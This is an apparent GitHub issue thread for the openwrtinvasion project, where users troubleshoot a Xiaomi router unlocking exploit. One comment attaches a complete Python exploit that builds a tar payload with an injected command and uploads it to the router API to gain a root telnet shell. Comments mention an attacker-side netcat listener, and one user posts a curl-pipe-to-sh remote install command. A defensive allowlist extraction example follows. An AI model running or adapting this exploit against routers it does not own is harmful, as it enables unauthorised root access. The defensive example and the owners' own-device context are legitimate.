Comments (6)
Can’t help you, didn’t try to run it on Windows. If you manage to make it work please open a pull request. Otherwise, run it on Linux, which you can install in a virtual machine
from openwrtinvasion.
@ltg1710 if you're using a VPN (for example L2TP) connection, please see #13
from openwrtinvasion.
I installed it in a virtual machine (Ubuntu 18), but I also got this error: {"code":1629,"msg":"解压失败,可能文件已经损坏"}
from openwrtinvasion.
@ltg1710 I want to know how you solved it in the end. I'm in the same situation as you, using Windows WSL. So is it because of a file format problem that it can only be used under macOS?
from openwrtinvasion.
Eventually I switched to a Linux computer and it worked. I don't know why, but it looks like Windows WSL won't work
from openwrtinvasion.
{"code":1629,"msg":"解压失败,可能文件已经损坏"}
I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware.
The "telnet" worked well until approximately May 1st, before I installed the Aria2 Ngrok on MIXBOX. Before that day, I only had ShadowSocks on MIXBOX, and it worked well.
Finding the "telnet" method inaccessible, I reset the official firmware 2.28.62, but I still can't use "telnet". Then I started to look into "remote_command_execution_vulnerability.py" and its dependencies, then added some debug prints, as shown in the attachment.
I personally think the reason for the first breakdown is the low ROM in the 4A-Gigabit. It can't install too many plugins. A complete erase of memory may help, but I don't know how......
I would really appreciate it if someone could help me restore "telnet".
First run on Win 10. The bug appeared, so I tried Ubuntu 20.04 LTS; both failed with {"code":1629,"msg":"解压失败,可能文件已经损坏"}
Besides, I found it unnecessary to flash OpenWrt firmware if you only want the very SSR.
I installed MIXBOX on my 4A-Gigabit using the "telnet" command line:
sh -c "$(curl -kfsSl https://monlor.coding.net/p/mbfiles/d/mbfiles/git/lfs/master/install.sh)" && source /etc/profile &> /dev/null
MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.
Attachment:
remote_command_execution_vulnerability.py
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py
import os
import shutil
import tarfile
import requests
router_ip_address = input("Router IP address: ")
# router_ip_address = "192.168.0.21"
# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/script.sh exploit) &)"
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
if os.path.exists("build"):
    shutil.rmtree("build")
else:
    print('no build')
os.makedirs("build")
## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
    template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
print(data)
with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:
    f.write(data)
print('write')
# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
    tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
    tar.add("script.sh")
    print('taring')
    # tar.add("busybox")
    # tar.add("extras/wget")
    # tar.add("extras/xiaoqiang")
## upload config file
print("start uploading config file...")
r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
print(r1.text)
# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)
# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))
from openwrtinvasion.
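An added example, not part of the posted script or of the project: the attachment's header comment says the uploaded backup is unpacked with tar zxf, so the uploader decides which files land in the extraction directory. One defensive counterpart is to check every archive member against an allowlist before extracting anything; the member name and size limit below are hypothetical, and the sample archives are constructed.

```python
import io
import os
import tarfile

# Hypothetical allowlist: names a legitimate backup would contain.
# The firmware's real backup layout is not given on the page.
ALLOWED_MEMBERS = {"config_backup.bin"}
MAX_MEMBER_SIZE = 1 << 20  # assumed limit: 1 MiB per file


def rejected_members(archive_bytes):
    """Return (name, reason) for every member that must not be extracted."""
    problems = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isreg():
                problems.append((member.name, "not a regular file"))
            elif member.name not in ALLOWED_MEMBERS:
                problems.append((member.name, "name not in allowlist"))
            elif member.size > MAX_MEMBER_SIZE:
                problems.append((member.name, "too large"))
    return problems


def safe_extract(archive_bytes, dest_dir):
    """Extract only if every member passes; otherwise write nothing."""
    problems = rejected_members(archive_bytes)
    if problems:
        raise ValueError("backup rejected: %r" % problems)
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            # Names are allowlisted plain file names, so no path traversal.
            target = os.path.join(dest_dir, member.name)
            with tar.extractfile(member) as src, open(target, "wb") as dst:
                dst.write(src.read())


def build_archive(files):
    """Constructed sample input: in-memory tar.gz from {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()
```

An archive carrying the two member names the posted script packs (`speedtest_urls.xml` and `script.sh`) is rejected as a whole, so nothing is written to the destination directory.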